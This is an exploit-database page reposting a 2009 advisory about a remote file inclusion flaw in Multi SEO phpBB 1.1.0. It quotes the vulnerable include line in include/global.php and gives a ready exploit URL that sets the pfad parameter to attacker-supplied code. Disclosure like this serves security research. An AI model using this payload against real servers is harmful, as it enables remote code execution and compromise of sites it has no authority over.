Advertisement






Multi SEO phpBB 1.1.0 (pfad) Remote File Inclusion Vulnerability

CVE Category Price Severity
N/A CWE-98 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2009-03-08
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 0.066995 0.515

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2009030116

Below is a copy:

==========================================================================


  [o] Multi SEO phpBB 1.1.0 Remote File Inclusion Vulnerability

       Software : Multi SEO phpBB version 1.1.0

       Vendor   : http://www.phpbb-seo.de/

       Download : http://www.phpbb-seo.de/downloads/multi.html

       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com


==========================================================================


  [o] Vulnerable file


       include/global.php


        include_once ($pfad . 'include/config.php');



  [o] Exploit

       http://localhost/[path]/include/global.php?pfad=[evilcode]


==========================================================================


  [o] Greetz

       MainHack BrotherHood [ http://mainhack.com/]
       Vrs-hCk OoN_BoY Paman bL4Ck_3n91n3 loqsa
       H312Y yooogy mousekill }^-^{ kaka11 martfella
       skulmatic olibekas ulga Cungkee k1tk4t str0ke

       GANYANG MALINGSIAL!!! [ http://malingsial.serverisdown.org/ ]

        
==========================================================================



Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum